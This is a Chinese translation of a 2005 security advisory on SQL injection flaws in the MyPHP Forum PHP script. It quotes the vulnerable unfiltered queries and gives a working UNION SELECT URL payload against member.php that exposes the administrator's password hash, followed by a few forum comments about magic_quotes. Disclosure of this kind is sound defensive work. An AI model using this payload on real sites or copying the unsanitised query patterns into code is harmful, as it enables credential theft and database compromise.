翻译网站:  http://www.bnso.net/
翻译:Z.C.Y[B.C.T]

发布日期：2005-2-9 8:17AM
发布作者：foster GHC <foster ghc ru>
信息  ID：<20050209081714.15780.qmail@www.securityfocus.com>
资料来源：http://www.securityfocus.com/arc ... -02-09/2005-02-15/0
官方地址：http://www.myphp.ws
漏洞类型：SQL注入



产品描述：
MyPHP论坛是一个有限制特征的简单的信息布告栏脚本。



摘要：
几处SQL注入漏洞将会导致敏感信息，包括用户密码散列的泄露。



细节：用户outbound变量的肯定部分用于SQL查询时存在SQL注入漏洞。



[1]脚本：forum.php



代码：
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid=&#39;$fid&#39;") or die(mysql_error());
$nav = mysql_fetch_array($query);



通过$fid变量没有过滤可以SQL注入



[2]脚本：member.php



代码：
if($action == "viewpro") {
      $member = $HTTP_GET_VARS[&#39;member&#39;];
      $sql =  "SELECT * FROM $db_member WHERE username=&#39;$member&#39;";
      $query = mysql_query("SELECT * FROM $db_member WHERE username=&#39;$member&#39;")
or die("cant execute $sql");
      $member = mysql_fetch_array($query);



SQL代码注入
member.php?action=viewpro&member=[SQL code]



利用方法：
member.php?action=viewpro&member=nonexist&#39; UNION SELECT uid, username, password, status,
email, website, aim, msn, location, sig, regdate, posts, password as yahoo
FROM nb_member WHERE uid=&#39;1
将会显示管理员的名字和密码散列（在"Yahoo"字段里）



密码被encrypt()函数加密



代码：
function encrypt($string) {
   $crypted = crypt(md5($string), md5($string));
   return $crypted;
}



[3]脚本：forgot.php



代码：
$email = $_REQUEST[&#39;email&#39;];
      if (isset($email)) {
      $sql="SELECT * FROM $db_member WHERE email=&#39;$email&#39;";  
...
$result = mysql_query("SELECT username FROM $db_member WHERE email=&#39;$email&#39;");
                $username = mysql_result($result, 0);
                $msg = "
                Hello $username,
$email参数没有过滤



影响：通过此变量进行SQL注入



[4]脚本：include.php
这个脚本最重要，它是其他所有脚本的一部份。
$nbuser & $nbpass 变量没有过滤。



代码：
$query = mysql_query("SELECT * FROM $db_member WHERE username=&#39;$nbuser&#39;")



影响：通过$nbuser进行SQL注入.

这里所说的注射漏洞好象在利用的时候都是需要带如‘的吧~~~
php.ini默认设置会搞坏偶们D语句滴~~~~~

晕..和我发的那个diz2.5漏洞一样.要magic关才行...

对于该程序的漏洞利用并无测试！谢谢